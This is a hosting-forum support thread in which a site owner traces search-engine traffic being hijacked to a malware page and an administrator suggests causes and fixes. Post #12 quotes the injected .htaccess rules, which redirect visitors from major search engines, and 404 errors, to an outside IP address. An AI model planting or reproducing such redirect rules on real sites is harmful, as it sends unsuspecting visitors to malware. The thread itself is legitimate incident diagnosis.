
Thread: Weird: Google search result for my site leads to virus-installing fake site

  1. #11
    Matt is online now GlowHost Administrator

    Strange. The link on that page works fine for me too. So perhaps it is not all referrers, and only some? I'd be interested in what Google has to say.

    Regarding mail2forum, you could always have one written...

  2. #12
    omarfilip is offline Nearly a Master Glow Jedi

    Found the culprit: the .htaccess file in the root was added or modified with this code:

    Code:
    RewriteEngine On
    RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
    RewriteRule .* http://87.248.180.90/in.html?s=sg [R,L]
    Errordocument 404 http://87.248.180.90/in.html?s=sg_err
    and the same file was also placed in the public_html folder.

    Good call on the redirection/referrer cause, Matt.

    Why was the intrusion allowed in the Root folder? I would think that phpBB doesn't have access to the Root folder?

    What can we do to prevent future occurrences?

  3. #13
    Matt is online now GlowHost Administrator

    The logs seem to indicate that your FTP password was compromised. There are some newer exploits out there where a 3rd party site somehow manages to install a trojan on your PC and it sniffs out FTP passwords that have been saved on your PC, then sends them "home" and then "home" uploads all sorts of fun things from htaccess files to new scripts and the like.

    The best fix I have found is to run antivirus scans on all computers that you use to access the site via FTP. Once they are clean, change the main cPanel password to something impossible to guess, then set up FTP users for each machine that connects to the site via FTP, e.g. laptop@mydomain.com, desktop@mydomain.com, 3rdparty@mydomain.com, etc.

    That way, if and when it happens again, we can tell you which FTP user was compromised from the logs and you can focus your efforts on figuring out what the security issue is on that unique machine.

  4. #14
    omarfilip is offline Nearly a Master Glow Jedi

    McAfee scan came back clean. Running Avast scan now...will report results.

  5. #15
    omarfilip is offline Nearly a Master Glow Jedi

    Avast scan came back clear as well. This is the only machine I use for FTP connections to my server.

    Any other ideas where the compromise might have occurred? Could there be a flaw in cPanel?

  6. #16
    Matt is online now GlowHost Administrator

    Was the old password something easily guessed? I suppose the only other way they could get it is perhaps with a packet sniffer.

  7. #17
    omarfilip is offline Nearly a Master Glow Jedi

    Not easy to guess at all. Where would the packet sniffer intercept my traffic?

  8. #18
    Matt is online now GlowHost Administrator

    Anywhere on the Internet I suppose....

    how does a packet sniffer work - Google Search
